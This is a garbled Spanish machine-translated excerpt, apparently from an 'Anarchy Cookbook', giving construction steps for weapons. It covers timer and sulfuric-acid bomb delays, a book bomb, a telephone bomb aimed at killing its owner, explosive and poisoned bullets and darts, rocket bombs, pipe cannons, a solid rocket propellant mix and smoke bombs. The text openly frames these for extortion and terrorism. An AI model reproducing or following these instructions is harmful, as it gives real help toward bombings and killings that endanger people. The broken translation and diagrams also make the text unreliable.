| = | | = | ---------- Filtro | = | | | | | | F | ---------- agujero para fusible cigarrillos ------------ | | | | | | | | | | | | | | | | | | | _ | ---------- La luz este fin

RETRASOS TIMER --- ---Retrasos del temporizador, o "bombas de tiempo" suelen estar empleados por un individuo que desea para amenazar a un lugar con una bomba y la demanda de dinero para revelar su ubicación y los medios para que se desarmen. Tal dispositivo puede ser colocado en cualquier lugar poblado si se oculta correctamente. Hay varias maneras de construir un temporizador de retardo. Por la mera utilización de un tornillo como un contacto en el momento que la detonación se desea, y utilizando la manecilla de las horas de un reloj como el otro contacto, un temporizador simple se puede hacer. El minutero de un reloj debe ser eliminado, a menos que un retraso de menos de una hora que se desea.

La desventaja principal con este tipo de temporizador es que sólo se puede ajustar para un tiempo máximo de 12 horas. Si un temporizador electrónico se utiliza, como el que en un reloj electrónico, a continuación, los retrasos de hasta 24 horas son posibles. Al eliminar el altavoz de un reloj electrónico, adjuntando los cables de un petardo o de ignición para ellos, un temporizador con un retraso de hasta 24 horas se puede hacer. Todo lo que uno tiene que hacer es establecer la hora de la alarma del reloj a la hora deseada, conecte los cables, y se van. Esto también podría hacerse con un reloj electrónico, si una batería más grande fueron utilizados, y la corriente a la bocina del reloj se intensificó a través de un transformador. Esto sería bueno, ya que tal temporizador puede ser extremadamente pequeña.

El temporizador en un VCR (grabador de vídeo) sería lo ideal. VCR por lo general se pueden establecer para los tiempos de hasta una semana. Los cables de la temporizador para el aparato de control serían los que un encendedor o cebo estaría conectada a. Además, se pueden comprar en tiendas de electrónica temporizadores que se trabajan bien. Finalmente, se podría emplear un reloj digital, y utilizar un relé o un conmutador electro-magnético para disparar el dispositivo de ignición, y la corriente del reloj no tendría que ser intensificado.

RETRASOS --- --- QUIMICOSRetrasos químicos son poco frecuentes, pero pueden ser extremadamente eficaz en algunos casos. Estos fueron utilizados con frecuencia en las bombas lanzadas sobre los alemanes Inglaterra. El retraso se aseguraría de que una bomba detonaría horas o incluso días

Page 300: 106652012 the Anarchy Cookbook 2000 Es

después de que el bombardeo inicial, lo que aumenta el efecto aterrador sobre la ciudadanía británica.

Si un recipiente de vidrio se llena con ácido sulfúrico concentrado, y tapado con varias capas de papel de aluminio o una tapa que va a comer a través de, entonces se puede utilizar como un retraso. El ácido sulfúrico reaccionará con papel de aluminio para producir sulfato de aluminio y gas hidrógeno, y por lo que el recipiente debe estar abierto al aire en un extremo de manera que la presión del gas de hidrógeno que se está formando no se rompe el recipiente.

__ | | | | | | | | | | | | | | _____________ | | | | | | | | Sulfúrico | | | | | | | | Ácido | | | | | | ---------- Papel de aluminio | | _____________ | | (Varias capas) | _________________ |

La lámina de aluminio se coloca sobre el fondo del recipiente y se fija allí con cinta. Cuando el ácido come a través de la lámina de aluminio, se puede usar para encender un artefacto explosivo de varias maneras.

1. El ácido sulfúrico es un buen conductor de la electricidad. Si el ácido que se come a través de la lámina se recoge en un recipiente de vidrio colocado debajo de la lámina, y dos cables se colocan en el recipiente de vidrio, una corriente será capaz de fluir a través del ácido cuando ambos cables se sumergen en el ácido.

2. El ácido sulfúrico reacciona muy violentamente con el clorato de potasio. Si el ácido gotea hacia abajo en un recipiente que contiene clorato de potasio, el clorato de potasio va a estallar en llamas. Esta llama se puede usar para encender un fusible, o el clorato de potasio puede ser el encendedor para una bomba termita, si algunos de clorato potásico se mezclan en una proporción 50/50 con la termita, y esta mezcla se utiliza como un encendedor para el resto de la termita.

3. El ácido sulfúrico reacciona con permanganato de potasio en una forma similar.

206.Film Envases II por Bill

Por una explosión de metralla, relativamente baja, sugiero que vierte en un recipiente vacío de 35 mm. Haga un agujero en la tapa de plástico de un fusible. Estas golosinas hacer una explosión sonora de una milla de distancia fácilmente.

1. Meter el agujero antes de poner el polvo de flash en el bote.2. No permita que entre polvo en el borde del recipiente.3. Utilice sólo una cantidad muy pequeña y su forma de trabajo hasta el resultado

deseado. 4. No llene el polvo, funciona mejor suelto.5. No muela o frotar la mezcla - es sensible a la fricción.6. Utilice un fusible de largo.

Bombas 207.Book por el Éxodo

Ocultando una bomba puede ser extremadamente difícil en una época donde los autores de la violencia salvaje. Bolsos y carteras son a menudo buscado por las autoridades cuando uno entra a un lugar donde un individuo puede tener la intención de hacer estallar una

Page 301: 106652012 the Anarchy Cookbook 2000 Es

bomba. Un enfoque para disimular una bomba es construir lo que se llama una bomba libro; un artefacto explosivo que está totalmente contenida dentro de un libro.

Por lo general, un libro relativamente grande se requiere, y el libro debe ser de la variedad libro encuadernado para ocultar cualquier protuberancia de una bomba. Diccionarios, libros de derecho, libros de texto grandes, y otros libros de este tipo funcionan bien. Cuando una persona hace una bookbomb, él / ella debe elegir un tipo de libro que es apropiado para el lugar donde se va a la bomba de libro que se encuentre. La construcción real de un libro bomba puede ser realizado por cualquier persona que posee un taladro eléctrico y una sierra de calar. En primer lugar, todas las páginas del libro debe ser pegados juntos. Mediante el vertido de un contenedor completo de la cola soluble en agua en un balde grande y llenar la cubeta con agua hirviendo, una solución de pegamento-agua se puede hacer que mantendrá la totalidad de las páginas del libro con fuerza. Después de la solución de pegamento de agua se haya enfriado a una temperatura tolerable, y la solución se ha agitó bien, las páginas del libro debe ser sumergido en la solución de pegamento-agua, y cada página debe ser empapado a fondo.

Es muy importante que las cubiertas del libro no se atascan en las páginas del libro mientras que las páginas se están secando. Suspender el libro de las dos tapas y fijación de las páginas juntas en un tornillo de banco que funciona mejor. Cuando las páginas en seco, después de tres días a una semana, un agujero debe ser perforado en las páginas ya rígidos, y deben perforar tanto como la madera. Luego, mediante la inserción de la hoja de sierra para hacer frente a través de las páginas y aserrado un rectángulo de la mitad del libro, el individuo se quedará con una cáscara de las páginas del libro. Las páginas, cuando perforó a cabo, debería tener este aspecto:

________________________ | ____________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | __________________ | | | ______________________ |

(Libro de las cubiertas se omite)

Este rectángulo debe estar bien pegado a la cubierta posterior del libro. Después de construir su / su bomba, que por lo general es de la variedad o el temporizador controlado por radio, el atacante se coloca en el interior del libro. La propia bomba, y cualquiera que sea temporizador o detonador se utiliza, debe ser envasado en espuma para evitar que se mueva o desplazamiento sobre. Finalmente, después de que el temporizador está preparado, o el control de la radio se ha encendido, la tapa frontal se pega cerrada, y la bomba es llevada a su destino.

Bombas 208.Phone por el Éxodo

La bomba de teléfono es un dispositivo explosivo que se ha utilizado en el pasado para matar o herir a un individuo específico. La idea básica es simple: cuando la persona que contesta el teléfono, la bomba explota. Si un pequeño pero potente dispositivo de alto explosivo con una carga explosiva se coloca en el receptor telefónico, cuando la corriente fluye a través del receptor, la carga explosiva iba a explotar, detonar el explosivo alto en la mano de la persona. Nasty. Todo lo que se tiene que hacer es adquirir un detonador, y la cinta del receptor interruptor hacia abajo.

Page 302: 106652012 the Anarchy Cookbook 2000 Es

Desenrosque la tapa de la boquilla, y quitar el altavoz y conecte los cables del detonador de donde estaba. Colocar una masilla alto explosivo, tal como C-1 en el receptor, y atornillar la tapa, asegurándose de que la carga explosiva está rodeado por el C-1. Cuelgue el teléfono hacia arriba, y dejar la cinta en su lugar.

Cuando la persona a quien pertenece el teléfono trata de responder el teléfono, él se dará cuenta de la cinta, y retírela. Esto permitirá que la corriente fluya a través de la carga explosiva. Tenga en cuenta que el dispositivo no va a explotar con sólo hacer una llamada telefónica, el dueño del teléfono debe levantar el auricular, y retire la cinta. Es muy probable que el teléfono estará a su su / la oreja cuando el dispositivo explota ...

BOMBA mejorada de telefoníaLo anterior parece demasiado complicado para mí ... que sería mejor para manipular el dispositivo de la siguiente manera:

Desconecte primero el teléfono de la pared. Conecte los cables del detonador De acuerdo con los cables que van a utilizar el auricular, (puede que tenga que conectar con un relé para que el detonador puede recibir la energía de la línea completa, no sólo la potencia de audio en el auricular)

Paquete de C4 en el cuerpo del teléfono (no el teléfono) y vuelva a conectarla Cuando descuelga el teléfono, la energía fluirá a través del circuito para el detonador ....

________/ | ------ | \

~ | | ~@ @ @ @ @ @ @ @

@ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @

209.SPECIAL MUNICIONES por el Éxodo

MUNICIÓN ESPECIAL PARA cerbatanasLa cerbatana es un arma interesante que tiene varias ventajas. Una pistola de aire puede ser muy precisa, de ocultar, y entregar un proyectil explosivo o envenenado. La fabricación de un dardo explosivo o proyectil no es difícil. Para adquirir una pistola de aire, por favor póngase en contacto con el editor en una de las direcciones que se indican en la introducción.

Quizás el diseño más simple para tales implica el uso de una cápsula píldora, tales como el tipo que se toman para dolores de cabeza o alergias. Cápsulas de gelatina vacías de pastillas se pueden comprar en la mayoría de las tiendas de alimentos naturales. A continuación, la cápsula se llena con un fulminato sensible al impacto explosivo, tal como mercurio. Un adicional de carga explosiva de alto podría ser colocado detrás de la explosión sensible al choque, si una de las cápsulas más grandes fueron utilizadas.

Finalmente, la cápsula explosiva se reglued de nuevo juntos, y una espiga o algodón se pegan al final que contiene el explosivo, para asegurar que el explosivo impacto-detonante golpeado el primer objetivo.

Tal dispositivo, probablemente sería de alrededor de 3/4 de pulgada de largo, sin incluir la espiga o el algodón, y algo parecido a esto: ____________________ / Mercurio | \ ----------------------- (Fulminato | RDX) ----------------------} borlas \ ________ | ___________/-----------------------

Page 303: 106652012 the Anarchy Cookbook 2000 Es

Se debe tener cuidado, si un dardo poderosa estalló en la cerbatana, que fácilmente podría explotar la parte posterior de la cabeza.

MUNICIÓN ESPECIAL PARA WRISTROCKETS y hondasUn wristrocket moderno es un arma formidable. Se puede lanzar un juego de disparos de mármol alrededor de 500 pies con una precisión razonable. Dentro de 200 pies, que bien podría ser letal para un hombre o un animal, si se golpeó en una zona vital. Debido a que el proyectil de tamaño relativamente grande que se puede utilizar en una wristrocket, la wristrocket se puede adaptar para lanzar proyectiles explosivos relativamente potentes.

Un pequeño segmento de tubo de aluminio podría convertirse en un dispositivo de impacto-detonante llenándolo con un impacto sensible al material explosivo.

Además, como una tubería podría ser llenado con un explosivo de bajo orden, y está equipada con un fusible, que se encendía antes de que el dispositivo se ha disparado. Habría que asegurarse de que el fusible es de una longitud suficiente para asegurar que el aparato no explotó antes de alcanzar su objetivo.

Finalmente, .22 casquillos calibre, tales como el tipo que se utilizan en las pistolas .22 blanco calibre, hacer estallar munición excelente para wristrockets, pero deben ser utilizados en una gama relativamente estrecha, debido a su peso ligero.

MUNICIÓN ESPECIAL PARA ARMAS DE FUEGOCuando la munición especial se utiliza en combinación con la potencia y la rapidez de las armas de fuego modernas, se hace muy fácil de llevar un pequeño ejército con una sola arma. Es posible comprar munición explosiva, pero que puede ser difícil de hacer. Tal munición también pueden ser fabricados en el hogar. Hay, sin embargo, un riesgo implicado con la modificación de cualquier munición. Si la munición se modifica incorrectamente, de tal manera que hace que la bala la más mínima poco más amplio, una explosión en el cañón del arma se producirá. Por esta razón, nadie debería intento de fabricar ese tipo de municiones.

Municiones especiales para las pistolasSi una persona desea para producir munición explosiva para ella su / arma de fuego, él / ella puede hacerlo, siempre que la persona tenía un explosivo sensible al impacto y unas pocas herramientas simples. Una primera compra de todas las balas de plomo, y luego hacer o adquirir un explosivo impacto detonar. Al perforar un agujero en una bala de plomo con un taladro, un espacio podría ser creado para la colocación de un explosivo. Después de llenar el agujero con un explosivo, que sería sellado en la bala con una gota de cera caliente de una vela. Un diagrama de una bala terminó la explosión se muestra a continuación. _O_ ------------ gota de cera / | * | \ | | * | - | ----------- Sensible al impacto explosivo | | _ | | | _____ |

Este diseño hueco también trabaja para poner veneno en las balas.

En muchas novelas de espionaje, un asesino es descrito como de fabricación "balas explosivas" mediante la colocación de una gota de mercurio en la nariz de una bala. Mediante la experimentación se ha encontrado que esto no funcionará. El mercurio reacciona con el plomo para formar un compuesto de plata inerte.

Munición especial para escopetasDebido a sus agujero de gran tamaño y alta potencia, es posible crear un poco de munición especial extremadamente poderoso para su uso en escopetas. Si un cartucho de escopeta se abre en la parte superior, y se eliminó el disparo, la cáscara se puede volver a cerrarse. Entonces, si se puede encontrar una muy suave, ligero taco de madera que se encuentra cerca de la anchura del agujero de la escopeta, una persona puede hacer varios tipos de escopeta lanzados desde las armas.

Page 304: 106652012 the Anarchy Cookbook 2000 Es

Inserte la clavija en el cañón de la escopeta con la cáscara sin la inyección en la cámara de cocción. Marque la espiga cerca de seis pulgadas de distancia del extremo del cañón, y sacarlo de la barrica.

A continuación, decida qué tipo de artefacto explosivo o incendiario se va a utilizar. Este dispositivo puede ser una botella de fuego químico, una bomba o una bomba de termita. Después de que el dispositivo está hecho, debe estar firmemente sujeto a la clavija. Cuando se hace esto, colocar el pasador de vuelta en la escopeta. La bomba o dispositivo incendiario debe estar en el extremo de la espiga.

Asegúrese de que el dispositivo tiene un fusible de tiempo suficiente, encender la mecha y disparar la escopeta. Si el proyectil no es demasiado pesado, rangos de hasta 300 m son posibles. Un diagrama de un proyectil de escopeta se muestra a continuación:

____ | | | | | | | | | ----- Bomba, bien pegada al taco | | | | | __ | | | | | | | ------- Fusible | | | | | | | | | | | --------- Pasador | | | | | | | | --------- Insertar este extremo en la escopeta | | | |

Especiales "lanzagranadas espacios en blanco" se debe utilizar - el uso de munición de fogueo regular puede hacer que el dispositivo a la tierra peligrosamente cerca del usuario.

Munición especial para aire comprimido y / ARMAS DE GASEsta sección trata de la fabricación de munición especial para armas de aire comprimido o gas comprimido, como pistolas de aire comprimido de la bomba, CO ² pistolas de aire comprimido y pistolas .22 cal precipitado. Estas armas, aunque por lo general considerados como juguetes de los niños, pueden convertirse en armas y no peligrosos.

MUNICIÓN ESPECIAL PARA pistolas de aire comprimidoUna pistola de aire comprimido, por este manuscrito, se tendrán en cuenta cualquier tipo de rifle o pistola que utiliza aire comprimido o CO ² de gas para disparar un proyectil de un calibre de .177, ya sea BB o perdigón de plomo. Estas armas de fuego pueden tener casi tan alta una velocidad de salida como un rifle de balas de cocción. Debido a la velocidad a la cual un proyectil calibre .177 recta, un proyectil impacto detonante se puede hacer fácilmente que tiene un calibre de .177.

La mayoría de las municiones para armas de fuego de más de .22 calibre de uso de cebadores para encender el polvo en la bala. Estas cartillas se pueden comprar en las tiendas de armas, ya que mucha gente le gusta volver a cargar sus propias balas. Estos cebadores detonar cuando son golpeados por el percutor de una pistola. También detonará si se tiran en una superficie dura a una gran velocidad.

Por lo general, también cabe en el cañón de una pistola calibre .177. Si se inserta el extremo plano en primer lugar, van a detonar cuando el arma se disparó en una superficie dura. Si tal cebador se une a un trozo de tubo de metal delgado, tal como el utilizado en una antena, el tubo puede ser llenado con un explosivo, se selló, y disparado desde un arma BB. Un diagrama de tal proyectil aparece a continuación:

Page 305: 106652012 the Anarchy Cookbook 2000 Es

_____ Cebadores _______ | | | | | | V V ____________ | ________________________ | ------------------- | ****** ******* Explosiva | -------------------} borla o | ________________________ | ------------------- Algodón | __________ | ------------------- ^ | | | _______ Antena de tubo

El cebador delantero está conectado a la tubería con una gota de pegamento. El tubo se llena entonces con un explosivo, y el cebador trasera está pegada sobre. Finalmente, una borla, o una pequeña pieza de algodón está pegado a la parte trasera de imprimación, para asegurar que el proyectil golpea sobre la imprimación frontal. El proyectil entero debe ser aproximadamente 3/4 de pulgada de largo.

MUNICIÓN ESPECIAL PARA calibre .22 PELLET ARMASUn calibre .22 precipitado pistola generalmente es equivalente a un rifle .22 cal, en rangos estrechos. Debido a esto, los proyectiles explosivos relativamente grandes se pueden adaptar para su uso con fusiles del calibre 22 de aire. Un diseño similar a la utilizada en el comienzo de este documento es adecuado, ya que algunas cápsulas son aproximadamente 0,22 o menor calibre. O bien, un diseño similar al que en este documento se podría utilizar, sólo uno tendría que comprar negros fulminantes en polvo, en lugar de cebadores municiones, ya que hay fulminantes que son alrededor de 0,22 calibre. Una tapa # 11 es demasiado pequeña, pero algo más grande va a hacer muy bien.

210.Rocketry por el Éxodo

Los cohetes y cañones son generalmente considerados como la artillería pesada. Los autores de la violencia no suelen emplear estos dispositivos, ya que son difíciles o imposibles de adquirir. No son, sin embargo, imposible de realizar. Cualquier persona que pueda hacer o comprar en polvo de color negro o pyrodex puede hacer tales cosas. Un terrorista con un cañón o un cohete grande es, en efecto, algo que temer.

COHETESLos cohetes fueron desarrollados por primera vez por los chinos varios cientos de años antes de que el mito de Cristo comenzó. Fueron utilizados para el entretenimiento en forma de fuegos artificiales. No se utiliza generalmente para fines militares porque eran inexactos, caros e impredecible. En los tiempos modernos, sin embargo, los cohetes son utilizados constantemente por los militares, ya que son baratos, confiables, y no tienen retroceso. Los autores de la violencia, por fortuna, no puede obtener los cohetes militares, pero se pueden hacer o comprar motores de cohetes. Modelo de cohetes es un pasatiempo popular de la era espacial, y para lanzar un cohete, un motor se requiere. Estes, una subsidiaria de Damon, es el principal fabricante de cohetes modelo y motores para cohetes. Su motor más potente, la "D" del motor, se puede desarrollar casi 12 libras de empuje, suficiente para enviar una carga explosiva relativamente grande a una distancia considerable. Otras compañías, como Centuri, producen aún más grandes motores de cohetes, que se desarrollan hasta 30 libras de empuje. Estos motores de los cohetes modelo son bastante fiables, y están diseñados para ser disparados eléctricamente. La mayoría de los motores de los cohetes modelo tiene tres secciones básicas. El siguiente diagrama le ayudará a entender ellos.

_________________________________________________________ | _________________________________________________________ | - Cartón \ Arcilla | ---------- | *** |. . . . | C | carcasa \ _______ | --------- | *** |. . . | L |

Page 306: 106652012 the Anarchy Cookbook 2000 Es

_______ --- Impulso --- | humo | expulsar | a | / Arcilla | --------- | *** |. . . . | Y | / ________ | _____________________ | _______ | ________ | _ | _______ | _________________________________________________________ | - Cartón cubierta

La boquilla de arcilla es donde el dispositivo de ignición se inserta. Cuando el área de la etiqueta "de empuje" se enciende, el "empuje" material, normalmente un grano grande solo de un propulsor tal como negro en polvo o pyrodex, quemaduras, obligando a grandes volúmenes de gases calientes, la rápida expansión hacia fuera de la boquilla estrecha, empujando el cohete hacia adelante.

Después de que el material ha sido consumido, la sección de humo del motor se enciende. Por lo general, un material de combustión lenta, similar al polvo negro que ha tenido diversos compuestos añadidos a ella para producir humo visible, usualmente negro, blanco o de color amarillo. En esta sección existe para que el cohete se verá cuando llegue a su altura máxima, o apogeo.

Cuando se quema, se enciende la carga de la eyección, la etiqueta "expulsión". La carga de la eyección se forma de polvo fino polvo negro. Se quema muy rápidamente, explotando, en efecto. La explosión de la carga de la eyección empuja el paracaídas del cohete. También se podría usar para encender la mecha de una bomba ...

Motores de los cohetes tienen su propio sistema de etiquetado peculiar. Etiquetas típicas del motor son: 1/4A-2T, 1/2A-3T, 3-A8, 4-B6, C6 7-, y 5-D12. La carta es un indicador de la potencia de un motor. "B" son los motores de dos veces tan potente como "A" motores, y "C" motores son dos veces tan potente como "B" motores, y así sucesivamente. El número que sigue a la carta es el empuje aproximado del motor, en libras. el número final y la letra es el tiempo de demora, desde el momento en que el período de empuje de los extremos de encendido del motor hasta que la carga de la eyección se dispara, "3T" indica un retraso de 3 segundos.

NOTA: Un propulsor cohete extremadamente eficaz puede ser hecha por el polvo de aluminio mezclado con perclorato de amonio y una cantidad muy pequeña de óxido de hierro. La mezcla se mantiene unida por una resina epoxi.

Bomba cohete BÁSICAUna bomba cohete es simplemente lo que su nombre indica: una bomba que se entrega a su destino por medio de un cohete. La mayoría de las personas que pudieran justificar un dispositivo que utiliza un motor de cohete para alimentar el dispositivo. Al cortar las aletas de madera de balsa y pegándolas a un motor de cohete grande, tal como la Estes "C" del motor, un cohete de base podría ser construido. A continuación, adjuntando un "fabricante de cráter", o CO ² bomba de cartucho para el cohete, una bomba habría que añadir. Para asegurarse de que el fusible de la "máquina de cráter" se enciende, la arcilla sobre la carga de la eyección del motor debe ser levantada con una herramienta de plástico. El fusible de la bomba se debe tocar la carga de la eyección, tal como se muestra a continuación.

____________ Motor de cohete | _________ Cráter fabricante de | | | | V | _______________________________V_ | _______________________________ | ______________________ \ | ------ | *** | :::: | / # # # # # # # # # # # \ \ __ | ------ | *** | :::: | ___ / # # # # # # # # # # # \ __ ------ | *** | :::: | --- Fusible --- # # # # explosiva) / | ------ | *** | :::: | ___ # # # # # # # # # # # / / ___ | ____________ | ___ | ____ | ____ \ _______________________ / | _______________________________ |

> empuje ------

Page 307: 106652012 the Anarchy Cookbook 2000 Es

humo> *** carga de la eyección> ::::

La cinta adhesiva es la mejor manera de unir el fabricante del cráter en el motor de cohete. Nota en el diagrama de la ausencia de la arcilla durante la carga de la eyección Muchos tipos diferentes de cargas explosivas se puede unir al cohete, tales como un alto explosivo, un dispositivo incendiario, o una botella química fuego.

Cualquiera de las aletas de cuatro o tres debe pegarse al motor de cohete para asegurar que el cohete vuela recta. Las aletas debe ser similar al siguiente diagrama:

| \ | \ | \ | \ <--------- Pegamento que se trata de motores de cohetes | \ | \ | \ | | | | | | el borde de ataque | -------> | | | | Borde de salida | | | <-------- | | | | | | | | \ _____ /

El borde de ataque y borde de salida debe ser lijada con papel de lija para que se redondean. Esto ayudará a que el cohete volar recto. Una sección de dos pulgadas de largo de una pajita de plástico se puede conectar al cohete para poner en marcha a partir. Una percha se puede cortar y convertido en una varilla de lanzamiento. El segmento de una paja de plástico debe ser pegada al motor del cohete adyacente a una de las aletas del cohete. Una vista frontal de una bomba cohete terminado se muestra a continuación.

| FIN | <------ aletas | | | | | | | __ | __ | V / \ V --------------- | | --------------- \ _____ / | O <----------- segmento de la pajita de plástico | | | <------ Aletas | |

Al cortar una percha en las flechas indicadas, y plegarlo, una varilla de puesta en marcha se puede hacer. Después de un fusible se inserta en el motor, el cohete simplemente se deslizó hacia abajo la varilla de lanzamiento, que se coloca a través del segmento de paja de plástico. El cohete debe deslizarse fácilmente a lo largo de una percha, tal como la ilustrada en la página siguiente: ____ / \

Page 308: 106652012 the Anarchy Cookbook 2000 Es

| | corte aquí _____ | | | | | | / \ V / \ _________________ / \ ________________ / \ / \ / ____________________________________________ \ ^ | | y aquí ______ |

Doble alambre en esta forma:

_______ Insertar en la paja | | | V ____________________________________________ \ \ \ \ \ <--------- Doble aquí para ajustar el ángulo de vuelo | | | | | | <---------- Poner este fin en tierra |

A LARGO PLAZO bomba coheteCohetes de largo alcance se puede hacer mediante el uso de cohetes de etapas múltiples. Motores de cohetes de modelos con un "0" para un tiempo de retardo están diseñados para su uso en etapas múltiples cohetes. Un motor como el D12-0 es un excelente ejemplo de este tipo de motor. Inmediatamente después del período de empuje es más, que estalle la carga de la eyección. Si otro motor se coloca directamente en contra de la parte de atrás de un "0" del motor, la explosión de la carga de la eyección enviará gases calientes y partículas de combustión en la boquilla de la máquina por encima de ella, y encender la sección de empuje. Esto hará que el utilizado "0" motor del cohete, causando una pérdida total de peso.

La principal ventaja de un cohete de múltiples etapas es que pierde peso como viajes, y gana velocidad. Cohetes de varias etapas debe ser diseñada de alguna manera diferente que un cohete de una sola etapa, ya que, a fin de que un cohetes para volar en línea recta, su centro de gravedad debe estar por delante de su centro de arrastre. Esto se logra mediante la adición de peso a la parte delantera del cohete, o moviendo el centro de la espalda de arrastre por poner aletas sobre el cohete que son bien detrás del cohete. Un diagrama de un cohete de múltiples etapas aparece en la página siguiente:

___ / \ | | | C | | M | ------ CM: Menaje del Cráter | | | |

Page 309: 106652012 the Anarchy Cookbook 2000 Es

| ___ | | | | | | | | C | ------ C6-5 de un motor bastante / | 6 | \ / | | | \ / | 5 | \ / | ___ | \ ---- Aletas / / | | \ \ / / | | \ \ / / | | \ \ / / | C | \ \ | / | 6 | \ | | / | | | \ | | / | 0 | \ | | / | ___ | \ | | / \ | \ ______ / ^ \ ______ / ------- Fin | | | | C6-0 del motor del cohete

El fusible se coloca en la parte inferior del motor.

Dos, tres, cuatro o incluso etapas se puede añadir a una bomba cohete para darle un alcance mayor. Es importante, sin embargo, que para cada etapa adicional, el área de la aleta se hace más grande.

211.Basic tubo cañón por el Éxodo

Un cañón simple se puede hacer de una tubería de espesor por casi cualquier persona. La única parte difícil es encontrar un tubo que es extremadamente suave en su interior. Esto es absolutamente necesario, de lo contrario, el proyectil se atasque. El cobre o tubería de aluminio es generalmente suficientemente suave, pero también debe ser muy grueso para resistir la presión desarrollada por los gases en expansión calientes en un cañón.

Si se utiliza un proyectil como un cartucho de CO ², ya que tal proyectil se puede hacer a explotar, un tubo que es de aproximadamente 1 ½ - 2 pies de largo es ideal. Tal tubo debe tener paredes que son al menos 1/3 a ½ pulgada de espesor, y ser muy suave en el interior. Si es posible, atornille un cierre de extremo en la tubería. De lo contrario, el tubo debe ser rizada y plegada cerrada, sin agrietarse o desgarro de la tubería. Un pequeño agujero se perfora en la parte posterior del tubo cerca de la engarzado o cierre de extremo. Entonces, todo lo que hay que hacer es llenar el tubo con aproximadamente dos cucharaditas de pólvora negra de grado o pyrodex, inserte un fusible, el paquete a la ligera con una embestida un fajo de papel de seda por el cañón, y la caída de un cartucho de CO ². Apoye el cañón de forma segura en contra de una estructura fuerte y encender la mecha, y se ejecuta. Si la persona tiene suerte, no han cobrado el cañón, y no se verán afectados por la explosión de piezas de cañón. Este cañón se vería así:

__________________ Fusible agujero | | V ________________________________________________________________ | | _____________________________________________________________ | | Cierre de extremo | Polvo | t.p. | cartucho de CO ²

Page 310: 106652012 the Anarchy Cookbook 2000 Es

| ______ | ______ | ____ | ____________________________________________ | _ | ______________________________________________________________ |

Un proyectil explosivo se pueden hacer para este tipo de cañón con un cartucho de CO ². Es relativamente fácil de hacer. Simplemente haga un fabricante de cráter, y construirla de tal manera que los proyectos de fusibles de una pulgada desde el extremo del cartucho. Luego, envuelva el fusible con cinta adhesiva, cubriendo por completo, a excepción de una pequeña cantidad en el extremo. Pon esto en el cañón de la tubería sin necesidad de utilizar un pañuelo de papel de embalaje acolchado.

Cuando el cañón se dispara, se encenderá el extremo de la mecha, y disparar el cartucho de CO ². El cartucho lleno de explosivos va a explotar en unos tres segundos, si todo va bien. Este proyectil se vería así:

___()

| C || M || || |\ /

[] <--- Fusible grabado[][]

! <--- Fusible desnudo (añadir matcheads)CANNON lanzamiento de cohetesUn cañón de lanzamiento de cohetes se puede hacer exactamente igual que un cañón normal, la única diferencia es la munición. Un cohete disparado desde un cañón volará más lejos que un cohete solo, ya que la acción de disparar supera la inercia inicial. Un cohete que se lanza cuando está en movimiento irá más allá de lo que se pone en marcha cuando está parado. Este cohete se asemejan a una bomba cohete normal, excepto que no tendría aletas. Se vería como la siguiente imagen. El fusible en un dispositivo que, obviamente, ser corta, pero no se enciende hasta que la carga del cohete explotó eyección. Por lo tanto, el retardo antes de la carga de la eyección, en efecto, se convierte en el retardo antes de que estalle la bomba. Tenga en cuenta que no es necesario poner el fusible en el cohete, el polvo de la quema en el cañón va a encender, y al mismo tiempo impulsar el cohete del cañón a una velocidad alta.

___/ \| || C || M || || |

| ___ || E || N || G || I || N || E || ___ |

REFORZADO TUBO DE CAÑÓNEn la escuela secundaria, un amigo y yo construimos cañones y lanzó cartuchos de CO ², etc, etc Sin embargo, el diseño del cañón es lo que quiero añadir aquí. Estaba hecha de tubos lisos de agua de acero, alambre de acero y plomo.

Aquí es una sección transversal: _______ | | | Xxxxx_____________________________________________ 2 "DI de la tubería | | _________________________________________________ | | .................... <- Alambre de acero}

Page 311: 106652012 the Anarchy Cookbook 2000 Es

| | _____} 3/4 "DI de la tuberíaesta | | | xxx______________________________________} _________________de alambre | | | | __________________________________________________________tiene | | .... | |hacia arriba |> | .... | |en el | | | | __________________________________________________________Cocina | | | xxx________________________________________________________ | | | ____} | | ..................... } <- Plomo Fundido | | _______________________________________________} _ | | _____________________________________________ | Xxxxx | _____ |

Hemos excavado en el lado de una pila de arena y construido una chimenea de ladrillo refractario. Luego nos pusimos el tubo de montaje y cable en el extremo de la chimenea, sentado sobre unos ladrillos. Luego tuvimos un soplete calentando la chimenea, de modo que el tubo estaba al rojo vivo. Luego se vierte plomo fundido en el espacio entre los tubos. Si las tapas no están atornillados en apretado real, parte del plomo se saldrá. Si esto sucede, apague el soplete y la tubería se enfríe lo suficiente y el cable se tensan y detener la fuga.

Se utilizó polvo negro casera y comercial, y el polvo de lento escopeta sin humo en esta cosa. Después de cientos de disparos que se corta y no hubo evidencia de grietas o hinchazón de la tubería interior.

212.Smoke bombas por el Éxodo

Un tipo de dispositivo pirotécnico que pueda ser empleado por un terrorista en el camino de muchos sería una bomba de humo. Este dispositivo podría ocultar la ruta de huida, o causar una desviación o, simplemente, dar cobertura. Este dispositivo, que eran suficientes para producir humo que olía bastante mal, podría obligar a la evacuación de un edificio, por ejemplo. Bombas de humo no son difíciles de hacer. Aunque las bombas de humo militares emplean el fósforo blanco o titanio en polvo compuestos, estos materiales son por lo general no está disponible aún para el terrorista más bien equipado. En su lugar, él / ella tendría que hacer la bomba de humo por sí mismos.

La mayoría de bombas de humo caseras suelen emplear algún tipo de polvo de base, como el negro polvo o pyrodex, para mantener la combustión. El material base se quemará bien, y proporcionar calor para hacer que los otros materiales en el dispositivo para quemar, pero no completamente o limpiamente. El azúcar de mesa, mezclado con azufre y un material de base, produce grandes cantidades de humo. Serrín, especialmente si tiene una pequeña cantidad de aceite en ella, y un polvo base también funciona bien. Otros ingredientes excelentes humo son pequeñas piezas de caucho, plástico finamente molidas y mezclas de los distintos productos químicos. El material de bengalas se puede mezclar con azúcar y azufre y un polvo de base produce mucho humo. La mayoría de las mezclas de combustible oxidante-, si la relación no es correcta, producen mucho humo cuando se añade a un polvo base. La lista de posibilidades es interminable. El truco para una bomba de humo con éxito también radica en el recipiente que se utilice. Un cilindro de plástico funciona bien, y contribuye a que el humo producido. El agujero de la bomba de humo donde entra el fusible debe ser suficientemente grande para permitir que el material para quemar sin causar una explosión. Esta es otra ventaja para los envases de plástico, ya que va a fundirse y arder cuando el material de humo se inflama, produciendo una abertura lo suficientemente grande como para evitar una explosión.

